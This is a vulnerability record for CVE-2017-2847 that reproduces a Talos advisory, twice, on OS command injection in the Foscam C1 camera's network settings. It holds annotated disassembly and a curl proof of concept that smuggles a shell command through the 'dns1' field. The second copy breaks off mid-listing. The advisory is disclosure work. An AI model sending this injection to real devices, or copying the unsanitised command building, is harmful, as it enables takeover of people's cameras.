ID CVE-2017-2847 Type cve Reporter cve@mitre.org Modified 2019-10-03T00:03:00
Description
In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.
{"seebug": [{"lastseen": "2017-11-19T11:56:57", "bulletinFamily": "exploit", "description": "### Summary\r\n\r\nAn exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nFoscam, Inc. Indoor IP Camera C1 Series\r\n```\r\nSystem Firmware Version: 1.9.3.17\r\nApplication Firmware Version: 2.52.2.37\r\nWeb Version: 2.0.1.1\r\nPlug-In Version: 3.3.0.5\r\n```\r\n\r\n### Product URLs\r\nFoscam\r\n\r\n### Details\r\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market.\r\nWhen various services are started, a service will first register a callback using the `CMsgClient::registerMsgHandle` function [1]. This will register a function to be called [2] when another service dispatches a message of the specified code [3]. 
An example of this registration process is handled inside the `FCGI_Init` function of the \"CGIProxy.fcgi\" service using the following code:\r\n```\r\n.text:00009F20 FCGX_Init_1f20\r\n.text:00009F20\r\n.text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410\r\n.text:00009F28 08 D0 4D E2 SUB SP, SP, #8\r\n.text:00009F2C 05 FC FF EB BL FCGX_Init\r\n.text:00009F2C\r\n.text:00009F30 00 10 50 E2 SUBS R1, R0, #0\r\n.text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed\r\n.text:00009F38 05 00 00 1A BNE leave_exit_1f54\r\n.text:00009F3C\r\n.text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74\r\n.text:00009F40 01 20 A0 E1 MOV R2, R1\r\n.text:00009F44 1A FC FF EB BL FCGX_InitRequest\r\n.text:00009F48\r\n.text:00009F48 00 00 50 E3 CMP R0, #0\r\n.text:00009F4C 03 00 00 0A BEQ loc_9F60\r\n...\r\n.text:00009F60 loc_9F60\r\n.text:00009F60 DB FE FF EB BL registerMsgClients_1ad4\r\n\r\n.text:00009AD4 registerMsgClients_1ad4\r\n.text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR}\r\n.text:00009AD4\r\n.text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8\r\n.text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code\r\n.text:00009AE0 04 00 A0 E1 MOV R0, R4\r\n.text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function\r\n.text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1]\r\n.text:00009AE8\r\n.text:00009AEC 04 00 A0 E1 MOV R0, R4\r\n.text:00009AF0 24 10 9F E5 LDR R1, =0x3001\r\n.text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n.text:00009AF8\r\n.text:00009AFC 04 00 A0 E1 MOV R0, R4\r\n.text:00009B00 18 10 9F E5 LDR R1, =0x3002\r\n.text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR}\r\n.text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n```\r\n\r\nAfter the 
\"CGIProxy.fcgi\" service decodes an HTTP request that's forwarded from the HTTP daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query to `CMsgClient::sendMsg`. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request.\r\n```\r\n.text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c\r\n.text:00009FAC 08 10 A0 E1 MOV R1, R8\r\n.text:00009FB0 07 00 A0 E1 MOV R0, R7\r\n.text:00009FB4 34 FC FF EB BL strcpy ; [4]\r\n.text:00009FB8\r\n.text:00009FB8 08 00 A0 E1 MOV R0, R8\r\n.text:00009FBC C0 FB FF EB BL strlen\r\n.text:00009FC0\r\n.text:00009FC0 CC 30 9F E5 LDR R3, =0x404\r\n.text:00009FC4 00 30 8D E5 STR R3, [SP]\r\n.text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5]\r\n.text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request\r\n.text:00009FD0 01 20 A0 E3 MOV R2, #1\r\n.text:00009FD4 04 40 8D E5 STR R4, [SP,#4]\r\n.text:00009FD8 08 40 8D E5 STR R4, [SP,#8]\r\n.text:00009FDC 0C 40 8D E5 STR R4, [SP,#12]\r\n.text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C]\r\n.text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8\r\n.text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *)\r\n```\r\n\r\nThe handler for code 0x4001 is in the \"webService\" binary and is done by the function `executeCGICmd` at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that's responsible for extracting the user name, password, and command that was specified within the user's query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to `funcptr`. 
If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by `findJsonCallbackCommand` at [7]. If authentication is required from the command, then the user name and password will be checked via `strcmp` and then the function call at [9] will execute the function pointer.\r\n\r\n```\r\n.text:0001E5A4 executeCGICmd\r\n.text:0001E5A4\r\n.text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28\r\n.text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440\r\n.text:0001E5B0 00 80 A0 E1 MOV R8, R0\r\n.text:0001E5B4 06 10 A0 E1 MOV R1, R6\r\n.text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68\r\n.text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6]\r\n\r\n.text:00028EAC sub_28EAC\r\n.text:00028EAC\r\n.text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR}\r\n.text:00028EB0 00 40 51 E2 SUBS R4, R1, #0\r\n.text:00028EB4 00 80 A0 E1 MOV R8, R0\r\n.text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118\r\n.text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF\r\n.text:00028EC0 8B 00 00 0A BEQ leaving_290F4\r\n...\r\n.text:00028F4C 00 00 50 E3 CMP R0, #0\r\n.text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88\r\n...\r\n.text:00028F88 findCmdCallback_28F88\r\n.text:00028F88 05 00 A0 E1 MOV R0, R5\r\n.text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24\r\n.text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7]\r\n.text:00028F94 00 90 50 E2 SUBS R9, R0, #0\r\n.text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8\r\n...\r\n.text:00028FB8 checkIfAuthNeeded_28FB8\r\n.text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24]\r\n.text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF\r\n.text:00028FC0 08 10 93 E5 LDR R1, [R3,#8]\r\n.text:00028FC4 02 00 51 E1 CMP R1, R2\r\n.text:00028FC8 06 00 00 1A BNE authenticate_28FE8\r\n...\r\n.text:00028FD8 04 00 A0 E1 MOV R0, R4\r\n.text:00028FDC 33 FF 2F E1 BLX R3 ; [8]\r\n.text:00028FE0 09 00 A0 E1 MOV R0, R9\r\n.text:00028FE4 42 00 00 EA B leaving_290F4\r\n...\r\n.text:000290E0 04 00 
A0 E1 MOV R0, R4\r\n.text:000290E4 33 FF 2F E1 BLX R3 ; [9]\r\n.text:000290E8 05 00 A0 E1 MOV R0, R5\r\n.text:000290EC 00 00 00 EA B leaving_290F4\r\n...\r\n.text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118\r\n.text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC}\r\n```\r\nWhen handling the \"CGIProxy.fcgi\" command \"setIpInfo\", the function `setIpInfo_37f30` will be called. This function is responsible for setting up the interface either via dhcp or by manually setting an IP address, netmask, gateway and dns. At the beginning of the function, the parameters [10] for \"callbackJson\", \"isDHCP\", \"ip\", \"gate\", \"mask\", \"dns1\", \"dns2\" are extracted from the query. Afterwards, the \"isDHCP\" value [11] is checked against 0 and if it is, the the \"ip\" and \"mask\" parameter values are passed to the function `sub_3FE28` [12] to be parsed using `inet_addr`: 0 is returned if parameters are correctly parsed, -1 otherwise. The return value is passed via IPC via code 0x3001 [13], which is handled by the binary \"CGIProxy.fcgi\" and takes care of returning the error code as result of the operation. 
Regardless the \"ip\" and \"mask\" parameters were parsed correctly or not, the execution will continue and another message is sent with code 0x601d via IPC [14].\r\n```\r\n.text:0003FF30 setIpInfo_37f30\r\n.text:0003FF30\r\n.text:0003FF30 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\r\n...\r\n.text:0003FF54 38 11 9F E5 LDR R1, =str.callbackJson\r\n.text:0003FF58 BA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF60 30 11 9F E5 LDR R1, =str.isDHCP\r\n...\r\n.text:0003FF68 B6 A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF7C 18 11 9F E5 LDR R1, =str.ip\r\n...\r\n.text:0003FF98 AA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFA0 F8 10 9F E5 LDR R1, =str.gate\r\n...\r\n.text:0003FFAC A5 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFB0 EC 10 9F E5 LDR R1, =str.mask\r\n...\r\n.text:0003FFBC A1 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFC0 E0 10 9F E5 LDR R1, =str.dns1\r\n...\r\n.text:0003FFCC 9D A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFD4 D0 10 9F E5 LDR R1, =str.dns2\r\n...\r\n.text:0003FFDC 99 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFE0 1C 34 DD E5 LDRB R3, [SP,#0x4E0+var_C4] ; [11]\r\n.text:0003FFE4 00 00 53 E3 CMP R3, #0\r\n.text:0003FFE8 05 00 00 1A BNE loc_40004\r\n.text:0003FFEC 07 00 A0 E1 MOV R0, R7 ; \"ip\" value\r\n.text:0003FFF0 06 10 A0 E1 MOV R1, R6 ; \"mask\" value\r\n.text:0003FFF4 8B FF FF EB BL sub_3FE28 ; [12]\r\n.text:0003FFF8 00 00 50 E3 CMP R0, #0\r\n.text:0003FFFC 00 20 E0 13 MOVNE R2, #0xFFFFFFFF\r\n.text:00040000 00 00 00 1A BNE loc_40008\r\n.text:00040004\r\n.text:00040004 loc_40004\r\n.text:00040004 00 20 A0 E3 MOV R2, #0\r\n.text:00040008\r\n.text:00040008 loc_40008\r\n...\r\n.text:00040034 7C 10 9F E5 LDR R1, =0x3001 ; [13]\r\n...\r\n.text:00040050 81 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040068 54 10 9F E5 LDR R1, =0x601D ; [14]\r\n...\r\n.text:00040084 74 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040090 F0 80 BD E8 LDMFD SP!, {R4-R7,PC}\r\n```\r\nCode 0x601d is handled in the 
\"devMng\" binary by the function `OnDevMngMsgSetIpInfo_120ac`. The function extracts \"isDHCP\", ip\", \"mask\", \"gate\", \"dns1\" and \"dns2\" parameters from the IPC call and passes them to the function `sub_3D880` [15]. This function checks a global variable for the state of the operation. In this first call, the branch is not taken and the function will only call `sub_37ED8` [17], which saves all the parameters in \"/mnt/mtd/app/config/NetworkConfig.bin\". Parameters are also saved in a global structure, to allow access from concurring threads. If no errors are returned, `OnDevMngMsgSetIpInfo_120ac` will call `sub_3AAE4` [19] by passing the pointer to a global structure [18]. The purpose of this function is to flag the completion of the interfaces configuration by putting \"1\" into the structure, at 0x8822c [20].\r\n```\r\n.text:0001A0AC OnDevMngMsgSetIpInfo_120ac\r\n.text:0001A0AC\r\n.text:0001A0AC 70 40 2D E9 STMFD SP!, {R4-R6,LR}\r\n...\r\n.text:0001A140 CE 8D 00 EB BL sub_3D880 ; [15]\r\n\r\n\r\n.text:0003D880 sub_3D880\r\n.text:0003D880\r\n.text:0003D880 F0 45 2D E9 STMFD SP!, {R4-R8,R10,LR}\r\n...\r\n.text:0003D898 00 20 D2 E5 LDRB R2, [R2] ; [16]\r\n.text:0003D89C 1A 00 00 0A BEQ loc_3D90C\r\n.text:0003D8A0 00 00 52 E3 CMP R2, #0\r\n...\r\n.text:0003D8BC 05 10 A0 E1 MOV R1, R5\r\n.text:0003D8C0 04 30 D1 E4 LDRB R3, [R1],#4\r\n.text:0003D8C4 10 30 C4 E5 STRB R3, [R4,#0x10]\r\n.text:0003D8C8 14 00 84 E2 ADD R0, R4, #0x14\r\n.text:0003D8CC 9E 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8D0 08 10 85 E2 ADD R1, R5, #8\r\n.text:0003D8D4 18 00 84 E2 ADD R0, R4, #0x18\r\n.text:0003D8D8 9B 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8DC 0C 10 85 E2 ADD R1, R5, #0xC\r\n.text:0003D8E0 1C 00 84 E2 ADD R0, R4, #0x1C\r\n.text:0003D8E4 98 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8E8 10 10 85 E2 ADD R1, R5, #0x10\r\n.text:0003D8EC 20 00 84 E2 ADD R0, R4, #0x20\r\n.text:0003D8F0 95 52 FF EB 
BL std::string::operator=(std::string const&)\r\n.text:0003D8F4 24 00 84 E2 ADD R0, R4, #0x24\r\n.text:0003D8F8 14 10 85 E2 ADD R1, R5, #0x14\r\n.text:0003D8FC 92 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D900 10 00 84 E2 ADD R0, R4, #0x10\r\n.text:0003D904 73 E9 FF EB BL sub_37ED8 ; [17]\r\n...\r\n.text:0003E078 F0 85 BD E8 LDMFD SP!, {R4-R8,R10,PC}\r\n\r\n... OnDevMngMsgSetIpInfo_120ac\r\n...\r\n.text:0001A144 01 00 70 E3 CMN R0, #1\r\n.text:0001A148 04 00 00 0A BEQ loc_1A160\r\n.text:0001A14C 54 00 9F E5 LDR R0, =dword_85D88 ; [18]\r\n...\r\n.text:0001A15C 60 82 00 EB BL sub_3AAE4 ; [19]\r\n\r\n.text:0003AAE4 sub_3AAE4\r\n...\r\n.text:0003AB08 00 40 A0 E1 MOV R4, R0\r\n...\r\n.text:0003ABCC 34 30 9F E5 LDR R3, =0x24A4\r\n.text:0003ABD0 01 20 A0 E3 MOV R2, #1\r\n.text:0003ABD4 03 20 C4 E7 STRB R2, [R4,R3] ; [20]\r\n```\r\n\r\nThe application creates 13 threads in total at startup. One of them is continuously polling for network changes: `sub_42DE0`. Two functions are called in a loop: one for softAP configuration [21] and one for wifi and ethernet connections [22]. We will explore the latter.\r\n```\r\n.text:00042DE0 sub_42DE0\r\n.text:00042DE0\r\n.text:00042DE0 38 40 2D E9 STMFD SP!, {R3-R5,LR}\r\n.text:00042DE4 00 40 A0 E1 MOV R4, R0\r\n.text:00042DE8 06 50 A0 E3 MOV R5, #6\r\n.text:00042DEC\r\n.text:00042DEC loc_42DEC\r\n.text:00042DEC 05 10 A0 E1 MOV R1, R5\r\n.text:00042DF0 04 00 A0 E1 MOV R0, R4\r\n.text:00042DF4 68 E6 FF EB BL sub_3C79C ; [21]\r\n.text:00042DF8 00 10 A0 E1 MOV R1, R0\r\n.text:00042DFC 04 00 A0 E1 MOV R0, R4\r\n.text:00042E00 BE FE FF EB BL sub_42900 ; [22]\r\n.text:00042E04 00 50 A0 E1 MOV R5, R0\r\n.text:00042E08 04 00 9F E5 LDR R0, =0xF4240\r\n.text:00042E0C 51 3D FF EB BL usleep\r\n.text:00042E10 F5 FF FF EA B loc_42DEC ; loop\r\n```\r\n\r\n`sub_42900` is the function that actually checks for the value of the global variable at 0x8822c [23]. 
As soon as its value is not 0, the function sub_428E0 is called.\r\n```\r\n.text:00042D4C 88 30 9F E5 LDR R3, =0x24A4\r\n.text:00042D50 03 20 D4 E7 LDRB R2, [R4,R3] ; [23]\r\n.text:00042D54 00 00 52 E3 CMP R2, #0\r\n.text:00042D58 04 00 00 0A BEQ loc_42D70\r\n.text:00042D5C 00 20 A0 E3 MOV R2, #0\r\n.text:00042D60 03 20 C4 E7 STRB R2, [R4,R3]\r\n.text:00042D64 04 00 A0 E1 MOV R0, R4\r\n.text:00042D68 05 10 A0 E1 MOV R1, R5\r\n.text:00042D6C DB FE FF EB BL sub_428E0\r\n```\r\nAt this point the execution will continue with many different calls, from a higher level perspective the following is the path that will be taken, stripped to only interesting the stubs (capital names are user-controlled strings):\r\n```\r\nsub_428E0\r\n sub_3FB2C\r\n sub_3B94C\r\n system(\"ifconfig eth0 0.0.0.0\")\r\n system(\"ifconfig ra0 up\")\r\n sub_3B8F0\r\n sub_3A95C\r\n system(\"rm -rf /var/run/wpa_supplicant\")\r\n system(\"ifconfig ra0 down\")\r\n system(\"killall wpa_supplicant\")\r\n sub_3B804\r\n system(\"ifconfig ra0 up\")\r\n sub_4286C\r\n sub_3E164\r\n system(\"ifconfig ra0 0.0.0.0\")\r\n system(\"ifconfig ra0 down\")\r\n sub_3D880\r\n system(\"killall udhcpc\")\r\n fork()\r\n child: execlp(\"ifconfig\", \"ifconfig\", \"eth0\", IP, \"netmask\", NETMASK)\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route del default dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route add default gw GATEWAY dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS1 > /etc/resolv.conf\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS2 >> /etc/resolv.conf\")\r\n system(\"killall -9 OnvifAgent\")\r\n```\r\n\r\nFunction `sub_3E164` fetches the parameters from a global structure and passes them to `sub_3D880`. Function `sub_3D880` was already called before, but this time the global state is different. The function thus takes a different branch and the actual interface configuration takes place. 
User-supplied parameters are taken unmodified from a global structure. In this function the dns1 parameter [24] is never sanitized and used in a `sprintf` [25] call to build the final command that will be passed to `execlp` [26].\r\n\r\n```\r\n.text:0003DF90 B4 11 9F E5 LDR R1, =str.echonameservers1 ; \"echo nameserver %s > /etc/resolv.conf\"\r\n.text:0003DF94 10 20 95 E5 LDR R2, [R5,#0x10] ; [24]\r\n.text:0003DF98 04 00 A0 E1 MOV R0, R4\r\n.text:0003DF9C 66 53 FF EB BL sprintf ; [25]\r\n.text:0003DFA0 A4 53 FF EB BL fork\r\n.text:0003DFA4 00 30 50 E2 SUBS R3, R0, #0\r\n.text:0003DFA8 0C 00 00 1A BNE loc_3DFE0\r\n.text:0003DFAC 88 01 9F E5 LDR R0, =str.sh ; \"sh\"\r\n.text:0003DFB0 00 30 8D E5 STR R3, [SP,#0xD8+var_D8]\r\n.text:0003DFB4 00 10 A0 E1 MOV R1, R0\r\n.text:0003DFB8 80 21 9F E5 LDR R2, =str._c ; \"-c\"\r\n.text:0003DFBC 04 30 A0 E1 MOV R3, R4 ; [26]\r\n.text:0003DFC0 CC 53 FF EB BL execlp\r\n```\r\n\r\n### Exploit Proof-of-Concept\r\nThis vulnerability is reachable by the \"setIpInfo\" command and requires a valid user account with administrator privileges. 
The following proof of concept shows how to execute an arbitrary command.\r\n```\r\n$ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ sIP=192.168.0.20\r\n$ sMask=255.255.255.0\r\n$ sGW=192.168.0.1\r\n$ sDns1=1.1.1.1\r\n$ sDns2=2.2.2.2\r\n$ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\r\n```\r\n\r\n### Timeline\r\n* 2017-05-30 - Vendor Disclosure\r\n* 2017-06-19 - Public Release\r\n\r\n### CREDIT\r\nDiscovered by Claudio Bozzato of Cisco Talos.", "modified": "2017-07-04T00:00:00", "published": "2017-07-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96265", "id": "SSV:96265", "type": "seebug", "title": "Foscam IP Video Camera Command Injection Vulnerability(CVE-2017-2847)", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:02:06", "bulletinFamily": "exploit", "description": "### Summary\r\nAn exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.\r\n\r\n### Tested Versions\r\n```\r\nFoscam, Inc. 
Indoor IP Camera C1 Series\r\nSystem Firmware Version: 1.9.3.17\r\nApplication Firmware Version: 2.52.2.37\r\nWeb Version: 2.0.1.1\r\nPlug-In Version: 3.3.0.5\r\n```\r\n### Product URLs\r\nFoscam\r\n\r\n### CVSSv3 Score\r\n8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\r\n\r\n### Details\r\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market.\r\n\r\nWhen various services are started, a service will first register a callback using the `CMsgClient::registerMsgHandle` function [1]. This will register a function to be called [2] when another service dispatches a message of the specified code [3]. 
An example of this registration process is handled inside the `FCGI_Init` function of the \"CGIProxy.fcgi\" service using the following code:\r\n```\r\n.text:00009F20 FCGX_Init_1f20\r\n.text:00009F20\r\n.text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410\r\n.text:00009F28 08 D0 4D E2 SUB SP, SP, #8\r\n.text:00009F2C 05 FC FF EB BL FCGX_Init\r\n.text:00009F2C\r\n.text:00009F30 00 10 50 E2 SUBS R1, R0, #0\r\n.text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed\r\n.text:00009F38 05 00 00 1A BNE leave_exit_1f54\r\n.text:00009F3C\r\n.text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74\r\n.text:00009F40 01 20 A0 E1 MOV R2, R1\r\n.text:00009F44 1A FC FF EB BL FCGX_InitRequest\r\n.text:00009F48\r\n.text:00009F48 00 00 50 E3 CMP R0, #0\r\n.text:00009F4C 03 00 00 0A BEQ loc_9F60\r\n...\r\n.text:00009F60 loc_9F60\r\n.text:00009F60 DB FE FF EB BL registerMsgClients_1ad4\r\n\r\n.text:00009AD4 registerMsgClients_1ad4\r\n.text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR}\r\n.text:00009AD4\r\n.text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8\r\n.text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code\r\n.text:00009AE0 04 00 A0 E1 MOV R0, R4\r\n.text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function\r\n.text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1]\r\n.text:00009AE8\r\n.text:00009AEC 04 00 A0 E1 MOV R0, R4\r\n.text:00009AF0 24 10 9F E5 LDR R1, =0x3001\r\n.text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n.text:00009AF8\r\n.text:00009AFC 04 00 A0 E1 MOV R0, R4\r\n.text:00009B00 18 10 9F E5 LDR R1, =0x3002\r\n.text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR}\r\n.text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n```\r\n\r\nAfter the 
\"CGIProxy.fcgi\" service decodes an HTTP request that's forwarded from the HTTP daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query to `CMsgClient::sendMsg`. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request.\r\n```\r\n.text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c\r\n.text:00009FAC 08 10 A0 E1 MOV R1, R8\r\n.text:00009FB0 07 00 A0 E1 MOV R0, R7\r\n.text:00009FB4 34 FC FF EB BL strcpy ; [4]\r\n.text:00009FB8\r\n.text:00009FB8 08 00 A0 E1 MOV R0, R8\r\n.text:00009FBC C0 FB FF EB BL strlen\r\n.text:00009FC0\r\n.text:00009FC0 CC 30 9F E5 LDR R3, =0x404\r\n.text:00009FC4 00 30 8D E5 STR R3, [SP]\r\n.text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5]\r\n.text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request\r\n.text:00009FD0 01 20 A0 E3 MOV R2, #1\r\n.text:00009FD4 04 40 8D E5 STR R4, [SP,#4]\r\n.text:00009FD8 08 40 8D E5 STR R4, [SP,#8]\r\n.text:00009FDC 0C 40 8D E5 STR R4, [SP,#12]\r\n.text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C]\r\n.text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8\r\n.text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *)\r\n```\r\n\r\nThe handler for code 0x4001 is in the \"webService\" binary and is done by the function `executeCGICmd` at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that's responsible for extracting the user name, password, and command that was specified within the user's query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to funcptr. 
If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by `findJsonCallbackCommand` at [7]. If authentication is required from the command, then the user name and password will be checked via `strcmp` and then the function call at [9] will execute the function pointer.\r\n```\r\n.text:0001E5A4 executeCGICmd\r\n.text:0001E5A4\r\n.text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28\r\n.text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440\r\n.text:0001E5B0 00 80 A0 E1 MOV R8, R0\r\n.text:0001E5B4 06 10 A0 E1 MOV R1, R6\r\n.text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68\r\n.text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6]\r\n\r\n.text:00028EAC sub_28EAC\r\n.text:00028EAC\r\n.text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR}\r\n.text:00028EB0 00 40 51 E2 SUBS R4, R1, #0\r\n.text:00028EB4 00 80 A0 E1 MOV R8, R0\r\n.text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118\r\n.text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF\r\n.text:00028EC0 8B 00 00 0A BEQ leaving_290F4\r\n...\r\n.text:00028F4C 00 00 50 E3 CMP R0, #0\r\n.text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88\r\n...\r\n.text:00028F88 findCmdCallback_28F88\r\n.text:00028F88 05 00 A0 E1 MOV R0, R5\r\n.text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24\r\n.text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7]\r\n.text:00028F94 00 90 50 E2 SUBS R9, R0, #0\r\n.text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8\r\n...\r\n.text:00028FB8 checkIfAuthNeeded_28FB8\r\n.text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24]\r\n.text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF\r\n.text:00028FC0 08 10 93 E5 LDR R1, [R3,#8]\r\n.text:00028FC4 02 00 51 E1 CMP R1, R2\r\n.text:00028FC8 06 00 00 1A BNE authenticate_28FE8\r\n...\r\n.text:00028FD8 04 00 A0 E1 MOV R0, 